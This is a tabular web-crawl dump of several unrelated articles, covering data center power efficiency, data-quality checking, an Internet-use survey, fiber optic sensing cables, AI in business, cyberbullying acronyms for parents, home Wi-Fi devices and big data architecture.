text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
A lot of the focus in the data center energy efficiency world is placed on cooling, and rightly so: cooling servers can consume as much as 37% of a well-designed data center, according to Emerson. But there are opportunities to improve efficiency on the other side of the rack, too. The power delivery systems, including Uninterruptible Power Supplies (UPS) and transformers, can deliver significant energy (and cost) savings.
The UPS maintains electrical power loads during outages and conditions incoming power under regular circumstances to smooth out surges and other irregularities that could damage equipment or lead to downtime.
Most UPS systems lose energy in the inverter and transformers. Newer systems have power management systems that control switching between the inverter and transformers to increase efficiency. Energy Star rated UPS systems could increase efficiency by 30-55%. Both UPS systems and Power Distribution Units (PDUs) can benefit from newer models with efficient transformers, cutting an additional 2-3% of energy loss.
When choosing efficient UPS systems, it’s important to consider redundancy as well as the average power load. In an average data center, that’s maybe 60%. Power ratings are often measured at 100% while redundant N+1 systems will share the load to each sit at around 30-50%.
In the new Green House Data facility, efficiency gains are also found in the exterior transformers. Two transformers switch 13,200 down to 480 volts, moderating the 5MW of power on opening day.
In an electric transformer, losses basically come down to friction. No load losses are produced from the magnetic field in the core, with the biggest contributor being hysteresis losses. Hysteresis losses are magnetized and demagnetized laminations of the magnetic core (hysteresis translates as “to lag” as this flux lags behind the magnetic force). Load losses result from the heat generated from friction as electrons move along the conductor.
The Green-R-Pad distribution transformers we chose boast up to 70% reduced no-load losses. A single 1,000 kVa unit saves seven tons of C02 emissions annually.
Upgrading power systems might take some upfront investment, but the energy savings can be worth it down the road: the Department of Energy pegs annual savings of $90,000 from just a 5% increase in UPS efficiency for a 15,000 square foot data center.
Posted By: Joe Kozlowicz | <urn:uuid:98764c3d-6e73-45c6-acf0-0bec8170a922> | CC-MAIN-2017-04 | https://www.greenhousedata.com/blog/saving-energy-on-the-other-side-of-the-rack-ups-and-transformer-efficiency | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00174-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.936541 | 508 | 2.90625 | 3 |
Originally published February 14, 2006
Anyone who has delved into data from the real world knows it can be messy. Survey takers can write down the wrong response. People entering data into a computer can type in the wrong numbers. Computers sometimes garble data because of software bugs (especially when converting one file format to another). Data formats become obsolete as software changes. Electronic data recorders break or go out of adjustment. Analysts mislabel units and make calculational errors.
Cleaning the data to correct such problems is almost always necessary, but this step is often ignored. Ask about the process that was used to clean the data. If the response is just a blank stare or worse, you know you are in trouble. Many companies (such as AT&T and Sega of America) now assign people to check for data quality in the face of all the problems associated with real data.
Some of the more famous examples of how small mistakes in data processing can have disastrous results are found in the space program. In 1962, the Mariner I spacecraft went off course soon after launch and had to be destroyed. The cause of the malfunction was a missing hyphen in a single line of FORTRAN code. Arthur C. Clarke later quipped that this $80 million launch was ruined by “the most expensive hyphen in history.” (CNET online retells the story of this launch as well as other famous computer glitches.)
More recently (1999), NASA’s Mars Climate Orbiter was lost in space because engineers on the project forgot to convert English units to metric units in a key data file, a mistake that cost scientists years of work and taxpayers $125 million. (Source: Sawyer, Kathy. “Engineers’ Lapse Led to Loss of Mars Spacecraft: Lockheed Didn't Tally Metric Units.” The Washington Post. October 1, 1999, p. A1.)
Bad data can have a real cost for a business. If a 500,000-piece mailing uses an address list with an error rate of 20%, the company wastes $300,000 by sending mailings to incorrect addresses. It loses even more money because among those 100,000 missed prospects are about 1,500 people who would have become customers and purchased thousands of dollars worth of the company’s products over their lifetime. The losses from these missed customers can be many times greater than the immediate direct losses. (Source: Aragon, Lawrence. “Down with Dirt.” PC Week. October 27, 1997, p. 83.)
It is crucial to pore over raw data to check for anomalies before doing extensive analyses. For example, typographical errors can lead numbers to be ten, one hundred or one million times bigger than they should be. Looking over the raw data can help you identify such problems before you waste time doing analysis using incorrect numbers.
Bad data can ruin your credibility and call your work into question. Even if there is only one small mistake, it makes your readers wonder how many other mistakes have crept into your analysis. It is difficult to restore your credibility after some obvious mistake is revealed, so avoid this problem in the first place. Dig into your numbers and root out these problems before you finalize your memo, paper or presentation.
Some Specific Advice
If your data come from a non-electronic source, type the data into the computer yourself, assuming there is a manageable amount of data. There is no substitute for this effort, even if you are a highly paid executive, because it will help you identify inconsistencies and problems with the data and give you ideas for how to interpret them. This technique also gives you a feeling for the data that cannot be replicated in any other way. You will almost surely see patterns and gain unexpected insights from this effort.
Check that the main totals are the sum of the subtotals. Most documents are rife with typographical errors and incorrect calculations. Therefore, you should not rely blindly on any data source’s summations but calculate them from the base data. You can check your typing accuracy by comparing the sums to those in the source of data. If they match exactly, it is unlikely that your typing is in error. Even if you don’t check these sums, you can bet that some of your readers or listeners will. Do it yourself and avoid that potential embarrassment.
Check that the information is current. Do not forget that business and government statistics are revised regularly. Make sure you know the vintage of the input data used in the analysis. For example, don’t compare analysis results generated using one year’s census data with those based on another year’s data (unless your sole purpose is to analyze trends over time).
Check relationships between numbers that should be related in a predictable way. Such comparisons can teach valuable lessons. For example, when examining data on carbon emissions of different countries, a newcomer to the field of greenhouse gas emissions analysis might expect that the amount of carbon emitted per person would not differ much among industrialized countries. In examining such data, however, we find large differences in carbon emitted per person, from less than 1 metric ton/person/year in Portugal to more than 6 tons/person/year in Luxembourg. Determining why such differences exist is the logical next step, which will inevitably lead to further analysis and understanding.
Check that you can trace someone else’s calculation in a logical way. If you cannot do this, you can at least begin listing the questions you need to answer to start tracing the calculation. Ultimately, if you cannot reproduce the calculation, the author has broken a fundamental rule of good data presentation, and his analysis is suspect.
Compare the numbers to something else with which you are familiar, as a “first-order” sanity check. These comparisons can show you whether or not you are on the right track. Presenting such comparisons in reports and talks can also increase your credibility with your readers or listeners because it shows that your results “pass the laugh test.”
Normalize numbers to make comparisons easier. For example, the true size of total U.S. gross national product (GNP) in trillion dollars per year is difficult to grasp for most people, but if normalized to dollars per person per year will be a bit more understandable. Common bases for such normalizations are population (per person/per capita), economic activity (per dollar of GNP), or physical units of production (per kilowatt hour or per kilogram of steel produced).
If you have information that extends over time (“time series data”), normalize it to a base year to enhance comparisons. By expressing such data as an index (e.g., 1940 = 1.0), you can compare trends to those of other data that might be related. For example, if you plot U.S. raw steel production (Figure 1), population (Figure 2), and GNP (Figure 3) in separate graphs, it is difficult to gain perspective on how fast steel production is changing over time relative to these other two important determinants of economic and social activity. However, if you plot steel production over time as an index with 1940 = 1.0 (see Figure 4), you can plot population and GNP on the same graph. Such a graph will instantly show whether growth rates in the data differ.
In this example, real GNP grew by a factor of more than five from 1940 to 1990. U.S. steel production roughly doubled by 1970 and then declined by 1990 to roughly 50% above 1940 levels. The population in 1990 just about doubled from 1940 levels. (Sources: 1940-1980 GNP from the Statistical Abstract of the US 1990, p. 425. 1990 GNP in current dollars from 1997 World Almanac and Book of Facts, p. 133, adjusted to 1982 dollars using the consumer price index from p. 132 of that document.)
The trends for U.S. steel production in Figure 4 dramatically illustrate the changing fortunes of steel in a postindustrial economy. Just after World War II, steel use per capita increased as automobile ownership expanded and use of steel for bridges and other forms of construction also increased. After 1970, the steel industry began to face serious competition from foreign steel makers as well as from alternative materials such as aluminum alloys and composites. Consequently, U.S. production declined even as the population increased and real GNP went through the roof. (Source: U.S. raw steel production from 1997 World Almanac and Book of Facts, p. 153.)
Figure 1: U.S. production of raw steel 1940-1990 (million short tons)
Figure 2: U.S. population 1940-1990 (million people)
Figure 3: U.S. gross national product 1940-1990 (billion 1982 dollars)
Figure 4: U.S. raw steel production, population, and gross national product 1940-1990, expressed relative to 1940 levels (1940 = 1)
Break problems into component parts. Explore analysis results by examining the factors that led to those results. For example, suppose someone tells you that the market capitalization of Google in January 2006 was about $130 billion and that of General Electric (GE) was $350 billion. What steps should you take to understand what these numbers mean?
Market capitalization is the product of the number of shares outstanding and the stock price per share, as shown in the following equation:
The stock price per share can be further broken down into the product of the earnings per share and the price-to-earnings ratio, yielding the following simple model:
The product of the number of shares and the earnings per share gives the total annual earnings (profits) for each company. Substituting in the previous equation, we get:
If we divide both sides of this equation by annual revenues, we get:
All of these equations represent variations on the same model. Different forms of the model will be useful at different times.
For most companies, the basic information for the model is readily available on the Web, so that is the best place to start (you could also go to the library). Table 1 summarizes the key financial parameters for calculating market capitalization for the two companies (taken from Yahoo Finance on January 29, 2006).
The first thing to notice about the financial statistics for these two companies is a huge disparity. While GE’s market capitalization in January, 2006, was about three times larger than Google’s, GE’s revenues were almost thirty times larger. All other things being equal, we might expect that companies with similar market valuations would also have similar revenue streams. All other things are not equal, however, and finding out why will help illustrate this important analytical technique.
If Google’s market capitalization per dollar of revenues were the same as GE, we would expect that its market capitalization would be only one-tenth as large as it is. We need to explain this tenfold discrepancy. To do so, we examine the components of the last equation above. The first component is earnings per dollar of revenues, and the second component is the price-to-earnings ratio.
As Table 1 shows, Google’s earnings in January, 2006, were about twice as big as GE’s per dollar of revenues, which accounts for about a factor of 2.3 in our tenfold difference. The price-to-earnings ratio also differed between the two companies. Apparently, the stock market valued one dollar of Google’s earnings 4.5 times as much as one dollar of GE’s earnings, which accounts for the remaining difference.
By breaking these numbers into their component parts, we have been able to isolate the two key reasons for the tenfold discrepancy identified above. The next step is to explain why these two reasons exist.
Google’s greater profitability per dollar of revenue reflects the difference between industrial manufacturing and internet software development. The latter has very low marginal costs of reproducing the product and high gross margins. Google’s higher price-to-earnings ratio reflects the market’s belief that its dominance will allow the company to continue to generate growth in earnings at a pace vastly exceeding that of traditional industrial enterprises.
Dissecting analysis results by comparing ratios of key parameters is a powerful approach, and one to use frequently. Any time you have two numbers to compare, this kind of “ratio analysis” can lead to important insights into the causes of underlying differences between the two numbers.
Creating a presentation or an executive summary for a complex report always involves boiling an analysis down to the essentials. First, create equations (like the ones above) that calculate key analysis results as the product of several inputs multiplied together. Then, determine which of these inputs affects the results most significantly. Creating such models can help you think systematically about your results.
Applying these Skills to Reading Tables and Graphs
The profusion of tables and graphs in magazine and news articles gives you many opportunities to practice these skills, which will help you understand the bottom-line results and determine whether you find the author credible. If the tables and graphs are good enough, you can then read the paper to follow the author’s reasoning more closely.
If the tables and graphs are poorly designed or confusing, I lose respect for the author. It is essential that tables and graphs summarizing analysis results be clear, accurate, and well documented. If they aren’t, including them is worse than useless because they hurt your argument and your credibility.
Start by checking for internal consistency. I always begin at the bottom line of the table and work backward. I examine the column and row headings to be sure I understand what each one represents (I read the footnotes if I have questions). Then, I assess whether the components of the total add up to the total. This procedure shows me whether the calculations are accurate, and it helps me become familiar with the various parts of the analysis.
Not surprisingly (but fortuitously for purposes of this article), I found one internal inconsistency in the data on Yahoo finance in the course of creating the comparison between Google and GE above. Yahoo gives revenues per share of $19.6 for Google, but if you multiply those revenues per share by the number of shares, you get total revenue of $5.8 billion, instead of the $5.25 billion revenues listed in Yahoo finance. I assumed that the total revenues and numbers of shares given by Yahoo were correct and adjusted the revenues per share to reflect that assumption. You can’t take any data for granted!
It is a good idea to look over the numbers in the table and identify those that are abnormally small or large. Typographical errors are quite common in tables (particularly in tables that summarize results from other, more detailed tables), and a quick scan can help you find them. For example, if you are reading a table summarizing hours worked per week by different team members on a project, an entry from one person that is ten times larger than the entries for others should catch your attention and prompt you to investigate further. The number itself may not be wrong, but checking it will increase your confidence in the numbers and help you understand how they were calculated.
Sometimes numbers do not exactly add up because of rounding errors, not because there is a mistake in the calculations. For example, say you have formatted a spreadsheet table so there are no decimal places for the entries in the table. These entries might be 9.4 and 90.4, but in the table they are shown as 9 and 90 because the convention is to round numbers down to the next whole number when the decimal remainder is less than 0.5 (the remainder in both cases is 0.4 in this example). The sum is 99.8, which rounds to 100 and is shown in the spreadsheet as the total. The sum of 9 and 90 is 99, which makes the total of 100 look wrong even though there is a perfectly sensible explanation. If you’re not aware of this potential pitfall, you could be misled by these apparent errors.
Read the footnotes carefully. They should convey the logic of the calculations and the sources of key input data. If you cannot determine the methods used from the footnotes, you should be especially suspicious of the results and investigate further.
Check for ambiguous definitions and terminology. For example, there are at least five distinct definitions of the word “ton,” and analysts often neglect to specify which definition they are using. If it is not crystal clear what the label means, you are likely to be led astray when interpreting the numbers. A slightly different example involves the number of hours in a year. Many analysts assume it is 8,760 hours, but on average it is 8,766 hours because of leap years. This difference is essentially a definitional one, but it can lead to small inaccuracies in calculations.
The next step is to check consistency with independent external sources to make sure the values in the tables and graphs are roughly right. As described earlier, compare growth over time to growth in other key data, such as population and gross domestic product to get perspective on how fast something is growing relative to these commonly used indicators.
Does the information in the tables or graphs contradict other information you know to be true? That table of hours worked may list Joe as someone who worked little on the project at hand; but if you know for a fact that Joe slaved over this project for many weeks because it was his idea, then you will need to check the calculation. Similarly, if there is an entry of 175 hours for one week, it must be a typo or a miscalculation because there are only 168 hours in a week.
Take ratios of results and determine whether the relationships they embody make sense. If one component of the total is growing much faster than other components over time or if it is especially large compared to others, then investigate further. Look for large discrepancies and investigate when you uncover them.
Follow up when you encounter cognitive dissonance – any contradiction between your knowledge and the information in the table will lead to greater understanding, one way or the other. If there is a logical explanation for the contradiction, you have learned more about the relationships between the information in the table and what you knew before. If the contradiction indicates a real inconsistency, you have identified a flaw in the analysis. Root out the causes of cognitive dissonance, and you will enhance your knowledge without fail.
When John Holdren was a professor at the University of California Berkeley, he taught a delightful class titled “Tricks of the Trade.” In this class, he described many of the unwritten rules about being effective in the energy/environment field and listed key pitfalls in data acquisition and handling. I have aggregated them below into four golden rules:
Holdren’s advice when dealing with data is: “Be suspicious, skeptical, and cynical. Assume nothing.” Though it may sound paranoid to the uninitiated, such caution is an absolute necessity for the seasoned business analyst. | <urn:uuid:3e5c9042-d8de-4dd5-a8bc-005a3626103d> | CC-MAIN-2017-04 | http://www.b-eye-network.com/view/2386 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00202-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940263 | 3,919 | 3.203125 | 3 |
Demonstrating the increasing role of the network in people’s lives, an international workforce study by Cisco revealed that one in three college students and young professionals considers the Internet to be as important as fundamental human resources like air, water, food and shelter.
The Cisco report also found that more than half of the study’s respondents say they could not live without the Internet and cite it as an “integral part of their lives” – in some cases more integral than cars, dating, and partying.
These and numerous other findings provide insight into the mindset, expectations, and behavior of the world’s next generation of workers and how they will influence everything from business communications and mobile lifestyles to hiring, corporate security, and companies’ abilities to compete.
Dave Evans, chief futurist, Cisco: “The lifestyles of “prosumers’ – the blending of professionals and consumers in the workplace — their technology expectations, and their behavior toward information access is changing the nature of communications on a global basis. The findings in the Cisco Connected World Technology Report provide businesses with insights that will give them a competitive advantage when it comes to IT decisions and HR processes.”
Air, water, Internet: One of every three college students and employees surveyed globally (33%) believes the Internet is a fundamental resource for the human race – as important as air, water, food and shelter. About half (49% of college students and 47% of employees) believe it is “pretty close” to that level of importance. Combined, four of every five college students and young employees believe the Internet is vitally important as part of their daily life’s sustenance.
Life’s daily sustenance: More than half of the respondents (55% of college students and 62% of employees) said they could not live without the Internet and cite it as an “integral part of their lives.”
The new way to get around: If forced to make a choice between one or the other, the majority of college students globally – about two of three (64%) – would choose an Internet connection instead of a car.
Importance of Mobile Devices: Two-thirds of students (66%) and more than half of employees (58%) cite a mobile device (laptop, smartphone, tablet) as “the most important technology in their lives.”
Online interruption or disruption? College students reported constant online interruptions while doing projects or homework, such as instant messaging, social media updates and phone calls. In a given hour, more than four out of five (84%) college students said they are interrupted at least once. About one in five students (19%) said they are interrupted six times or more – an average of at least once every 10 minutes. One of 10 (12%) said they lose count how many times they are interrupted while they are trying to focus on a project.
The global study consists of two surveys – one involving college students, the other on young professionals in their 20s. Each survey includes 100 respondents from each of 14 countries, resulting in a pool of 2,800 respondents.
The complete report is available here. | <urn:uuid:f8976f63-0ace-4805-b218-28daba413772> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2011/09/22/cisco-reveals-the-importance-of-networks-in-daily-life/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00110-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955188 | 654 | 2.609375 | 3 |
To satisfy more applications of our life, Fiber Optic Sensing technology has grown in importance over the last few years. Fiber Optic sensing technology is now a fully mature and cost-effective technology which offers major advantages over conventional measurement methods. Especially the use of Fiber Bragg Gratings (FBGs) for measuring strain and temperature is now widespread throughout many industries and in many demanding applications. Sensing Fiber Optic Cable is a sensor based on optical fiber cable. Due to the physical quantities of outside environment, such as pressure vibrations, temperature changes, the transmission light intensity, phase, polarization, and other changes have changed. In order to detect the required physical quantities, Sensing Fiber Optic Cable is used because its more sensitive characteristic for some of these physical effects(see the following picture).
Applications of Sensing Fiber Optic Cable
Fiber optic sensor technology has been developed to satisfy particular needs in specific applications. It initially applied in the military. As the rapid development of technology, it becomes more generic and has a broad range of applications in more fields, even expected unforeseen applications will emerge. Sensing Fiber Optic Cable, as one important achievement of this technology now is widely used in Petrochemical, Steel, Mine for fire detecting, building health detecting, temperature detecting action.
Oil & Gas Industry
Being used for optimized production and integrity monitoring in risers, umbilicals and oil wells, and for subsea, reservoir and seismic monitoring.
To monitor the temperature of energy production and distribution facilities, power cables, high voltage switch gears and transformers etc. and contribute to the optimization of performance and operational safety.
To monitor the soil movement, dams and construction areas, also understand and monitor hydrological processes in agriculture, oceans, lakes, rivers and sewers.
Installed in transportation infrastructures, along highways embeded in roads, bridges and rail tunnels to achieve efficient, fast, flexible and cost-effective structural monitoring as well as fire, ice or water detection.
To protect our borders and critical infrastructure, such as pipelines, power distribution, airports, construction sites or national borders.
Sensing Fiber Optic Cable can help preventing major damage in many cases by measure any temperature increase caused by local fires or overheating in a specific area accurately and swiftly.
Sensing Fiber Optic Cable in Fiberstore
There are 6 kinds of Sensing Fiber Optic Cables on sale in Fiberstore. Our sensing fiber optic cable with excellent mechanical performance makes it use as easy as a wire and adapt to various conditions.
PBT Tube Temperature Sensing Optical Cable
The cable is consist of bare fiber, ointment, PBT imitation tubing, Kevlar and outer jacket which has a good performance of optic transmission, an excellent anti-electromagnet ability and resist water very well. It can be used for temperature and stress measurement, which is perfect for high voltage and electromagnetic area because of the nonmetallic structure.
Armored Temperature Detecting Sensor Cable
It is strengthened by both SUS spring tube and SUS braiding and has very good mechanical performance of tensile resistance and pressure resistance. The cable is widely used in fire detecting, building health detecting, temperature detecting, etc.
Silica Gel Sensing Fiber Optical Cable
The structure of cable is very simple, but the special Silicon jacket and Teflon tube ensure a very good performance of high temperature resistant and high voltage resistant so that it is very suitable for high temperature resistant and high voltage environment, it could work normally even in the 250 ℃ high temperature environment or 6kv high voltage environment.
Teflon Sheathed sensor cable
The Teflon cable is very suitable for high temperature resistant environment, it could work normally even in the 150 ℃ environment. And it could be used for fiber temperature sensing system.
Seamless Tube Temperature Sensing Optical Cable
The cable is make up of bare fiber, ointment, stainless steel seamless tube and sheath. Seamless tube can provide high tensile resistance and crush resistance. It is usually used in oil field, mine and chemical industry, for temperature and pressure inspection to avoid any accident.
Copper Braid Armored Sensor Cable
Copper braid armored sensor cable could be used in outdoor optical fiber communication and optical fiber sensor. In power environment, the special cable structure could reduce the impact of electromagnetic wave and electromagnetic field, and make less optical signal loss. | <urn:uuid:52ee47a4-329c-4e1b-8d1e-461a07f52cf6> | CC-MAIN-2017-04 | http://www.fs.com/blog/sensing-fiber-optic-cables-the-fiber-also-the-sensor.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00504-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.917478 | 903 | 2.6875 | 3 |
Artificial Intelligence—which we define as information systems and applications that can sense, comprehend and act—has moved beyond the research lab and captured the attention of CEOs and other high-level executives.
The media regularly draws attention to innovative business solutions based on AI. Venture capitalists are funding AI start-ups at a rapid pace. Technology companies are moving swiftly to create and capture value in this emerging area.
Decision makers must recognize that AI isn’t a matter of any single technology or application—whether driverless cars, smartphone virtual assistants or myriad of other examples.
In this report, we offer a perspective on how these technologies affect business and society, and present a framework for understanding how AI can deliver value for your organization and industry.
AI systems can be self-learning, like bright students who are given educational materials and then can learn by themselves. That is, computers are enabled to do the following:
Consider how a border-control kiosk uses computer vision technologies such as facial recognition to sense characteristics of travelers.
Integrated with other technologies such as multispectral image analysis (scanning passports using infrared and ultraviolet light), extensive information databases and matching algorithms, an integrated solution here can improve security by identifying people on unauthorized entry lists or others posing a risk.
AI systems also comprehend through technologies such as natural language processing, inference engines and expert systems.
These technologies have a wide range of applications across multiple industries. For example, a medical diagnostic system can help doctors identify diseases and suggest treatments.
An AI system acts independently, taking action within a process through technologies such as inference engines and expert systems, or it can direct action in the physical world.
Consider the driverless car, which senses the environment, understands the myriad inputs and then steers the car without assistance from a human driver.
The range of available AI solutions can be categorized by the complexity of the work that is being done, and second, the complexity of the data and information being worked with. The range of solutions can be classified into four primary types of activity models.
The efficiency model characterizes, which characterizes more routine activities based on well-defined rules, procedures and criteria. The goal here is to provide consistent, low-cost performance.
In this model, work is more likely to involve judgment and is highly reliant on individual expertise and experience—activities performed, for example, by doctors, lawyers, financial advisors and engineers.
Decision-making and action is generally taken by humans themselves, while technology’s role is to augment human sensing and decision making—enabling analysis and offering advice and implementation support.
The goal is to improve the overall ability of workers and companies to produce a particular desired result. This class of workers typically requires considerable knowledge of their industry, company and business processes.
Their success is highly reliant on coordination and communication and involves a wide range of interconnected activities—work such as administration, managing, sales and so forth. In these solutions, technology acts as personal assistant or agent on behalf of humans at their direction.
In this model, AI solutions enhance creativity and ideation by humans—activities and roles such as biomedical researchers, fashion designers, chefs, musicians and entrepreneurs. Humans make decisions and act, while technology helps identify alternatives and optimize recommendations.
Game–changer for every industry
A key is not to become too entranced by any particular technology, as if that technology by itself is the answer.
It is vital to think first in terms of types of work, and then consider the business rationale for integrating technologies into a total AI solution related to that work.
It is important that business continues to engage in the ongoing dialogue about these technologies’ effects on jobs, education and society.
What happens in terms of the social impact of AI is not up to the technology, but to us. The business opportunity of getting it right is too significant to be left to chance.
Receive e-mails from Accenture featuring new content that matches your interests.
Visit the subscription center to make your selections and subscribe to New from Accenture. | <urn:uuid:cf9e49d9-ba48-4df8-9ea3-81d8fccc3fab> | CC-MAIN-2017-04 | https://www.accenture.com/us-en/insight-artificial-intelligence-business-value | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00046-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935757 | 834 | 3.09375 | 3 |
Have you ever caught a glance of your child’s screen as they were chatting to friends online and wondered what they were saying? Are you a teacher, struggling to maximize internet safety in your classroom? How often have you found your students typing a sequence of letters conveying supposed nonsense?
Whilst acronyms and abbreviations offer a convenient shortcut to informal communication in the digital world, and however harmless they may first appear, the reality is that they are often used by young people to hide inappropriate behaviour from prying eyes. And beneath the unthreatening guise of a few capital letters can lie some severely distressing messages, usually designed with malicious intent. The question is, do you know your ‘LOL’ from your ‘ROFL’ and, if you needed to, could you decipher these twenty-first century slang terms to recognize when they are being used to facilitate bullying online?
In the quest to implement successful internet safetuy provisions in schools and ensure internet safety in a home environment, many parents, teachers and carers feel they lack the knowledge to accomplish these aims. That’s why we have shown our support by putting together a list of the top 5 acronyms and abbreviations that we think parents, carers and educators should be aware of. Impero have worked closely in partnership with the Anti-Bullying Alliance to offer advice to those responsible for the internet safety of young people, helping to find the balance between realizing the endless opportunities of the digital world, whilst also safeguarding children from the associated risks.
1. YHBT – You have been trolled
A recent phenomenon, an online ‘troll’ has been described as today’s modern menace. It is speculated that the term ‘troll’ derives from the fishing reference to tow bait behind a boat, but some also believe it refers to the well-known monster of the same name. Trolls trawl the internet actively creating arguments and posting provocative or inflammatory content in various online communities. Trolls have received huge media attention in recent years, with some facing prison sentences for defacing online tribute sites.
2. FUGLY – Fat and ugly
This is one of the most commonly used acronyms used to bully online, designed to insult a victim’s personal appearance. If you have witnessed a young person sending this term, then it is likely that they are using the acronym to insult a peer. Equally, if a child receives this term, it would suggest that they are a victim of cyberbullying.
3. GKYS – Go kill yourself
This is a particularly concerning term due to the seriousness of its nature, yet it is often difficult to determine the difference between the use of the term as banter or as a genuine threat. Regardless, if you discover a young person sending or receiving this term, the incident must be investigated seriously.
4. SITMF – Say it to my face
This term differs from the previous three, as it is typically used in retaliation to cyberbullying, as opposed to facilitate cyberbullying. If a young person is subjected to online bullying, this term could be used by the victim to encourage the perpetrator to confront them in the real world. Though the term may appear less concerning, it could potentially indicate bullying behaviour and should be dealt with accordingly.
5. JLMA – Just leave me alone
As with SITMF (say it to my face), it is important to be aware of the terms used by both perpetrators and victims in a cyberbullying situation, as they can all help to highlight that cyberbullying is taking place. If a perpetrator is sending messages of an unwanted nature, this term could be used by a victim in response.
It is impossible to know and remember every single phrase, acronym and abbreviation used by young people online today. New terms are constantly being invented; the best way to ensure internet safety is to be aware of the jargon and to develop a clear understanding of the definitions. | <urn:uuid:08d99050-f2ca-41db-ad79-420a7481c760> | CC-MAIN-2017-04 | https://www.imperosoftware.com/top-5-internet-safety-phrases/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00348-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960303 | 820 | 3.359375 | 3 |
Fact: We need fast, reliable Internet. And increasingly, we need it everywhere.
Nearly three-quarters of us believe that having high-speed Internet in every room of the house is either vitally important or very important. That’s according to our latest Consumer Entertainment Index study.
High-speed Internet is so important because it is related to almost everything we do, from video chatting with our family and friends to streaming movies on Netflix® and gaming over the Playstation® and Xbox One networks. A lot of things run expressly on the Internet, and the Internet, in turn, relies on the devices that deliver it throughout our homes.
Today we’re going to talk about the four most important ones: modems, Wi-Fi® routers, broadband gateways, and extenders.
The first piece of the puzzle is your modem: it brings the Internet into your home. Because it’s your home’s primary connection to the Internet, it’s arguably the most important device.
Of course, we all just want Wi-Fi without limits, and for that, you need a Wi-Fi router. It takes the Internet from your modem and creates a wireless signal that you can access throughout your home. But keep in mind that the strength of that wireless signal changes based on things inside your home, like the type of walls or floors it has to go through or how far away it is from the devices that it’s communicating with (i.e. tablets, cellphones)
A gateway is a device that combines the modem and Wi-Fi router into a single device. It brings the Internet signal into your home and also transmits it wirelessly.
So now we have our modem, router and gateway—but what happens when there’s a room in your home where the Wi-Fi is very weak or non-existent? There are many ways to improve the range of the Internet in your home, but one of the simplest and most cost-efficient is using a Wi-Fi network extender or repeater. It receives the wireless signal from your router or gateway and boosts it a further distance than the router may be capable of broadcasting on its own—like a megaphone does with your voice. But keep in mind that each wireless repeater cuts your bandwidth in half. So while it allows you to cover more ground, you’ll also lose some effective speed.
Now that we’ve talked about how these networking pieces work together, how do you know which one to buy? Check out our SURFboard web site for more information. | <urn:uuid:0938f38c-dd8b-4f9f-a9be-0b63074ed4fc> | CC-MAIN-2017-04 | http://www.arriseverywhere.com/tag/extender/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00100-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935367 | 533 | 2.515625 | 3 |
In our previous video, we described big data in terms of volume, velocity, and variety of information and then looked at some use cases of big data.
In this video, we’ll discuss the basic frameworks for big data implementations.
In general, big data implementations must support three major core capabilities:
- Store – First, it must be able to store all the data. There must be software and infrastructure necessary to capture and store high volumes of data.
- Process – Next, it must also be able to process the stored data by having the compute power to organize, enrich, and analyze the data.
- Access – Lastly, a big data framework must be able to access all of your data to retrieve, search, integrate, and visualize the data when and how required.
Along with these capabilities, the architectural building blocks of big data must integrate these core capabilities into three major layers.
Infrastructure services – The foundation of every big data architecture project is the infrastructure. Innovations over the last 10 years, including infrastructure services APIs, open source configuration management software, and the wide adoption of virtualization have allowed for more efficient deployment of servers, storage, and networking.
Essentially, what used to take months from procurement to configuration to load and deployment now takes minutes. In addition, data management software – which we’ll talk about more in a second – allows projects to be reliably coordinated across multiple commodity servers.
Scaling out commodity servers rather than scaling up expensive, customized, brand-name appliances is obviously a much less expensive proposition per bit of data captured and analyzed.
When considering hosting solutions for big data deployments, multi-tenant public cloud architectures usually have performance trade-offs to reach scale. The virtual, shared, and oversubscribed aspects of multi-tenant public clouds can lead to problems with noisy neighbors resulting in degradation of performance of your big data workloads.
To alleviate such problems for your big data workloads, a good alternative is to build out a dedicated infrastructure with bare-metal server nodes for several significant reasons. First, bare-metal servers provide fully dedicated compute resources for your big data workloads, eliminating the noisy neighbor problem of multi-tenant environments. Second, bare-metal servers can be deployed in flexible, cloud-like model, meaning they can be provisioned and de-provisioned instantly, depending on demand. And lastly, bare-metal solutions provide fully dedicated storage, meaning that all disks are local and can be configured with SSDs to achieve higher IOPS for the horizontally scalable distributed data management services, which is what we will discuss next.
Data management services – It builds horizontally scalable distributed data management services on top of the infrastructure services layer. Three types of technologies work together to manage big data in this layer.
First, data stream processing technology enables the filtering and capturing of high velocity information streams using parallel processing. Second, a distributed file management system, such as the Hadoop distributed file system (HDFS) handles routine file operations using a flexible array of storage and processing nodes to provide fault tolerance and scalability. And lastly, NoSQL databases that trade off integrity guarantees for theoretically unlimited scalability while maintaining database flexibility.
In terms of flexibility, the NoSQL databases eliminate the rigid schema of relational databases by allowing you to adapt to evolving data capture and management needs.
The third layer of the architectural building blocks of big data sits on top of the data management layer and is a class of middleware that leverages the data management layer to conduct query, analysis, and some transactional processing. An example of this is Pig, a data flow language, or Hive, a data warehouse framework in the Hadoop framework.
In our next and final big data video, Brian Bulkowski at Aerospoke will introduce how various data management and processing tools are used in a NoSQL big data deployment.
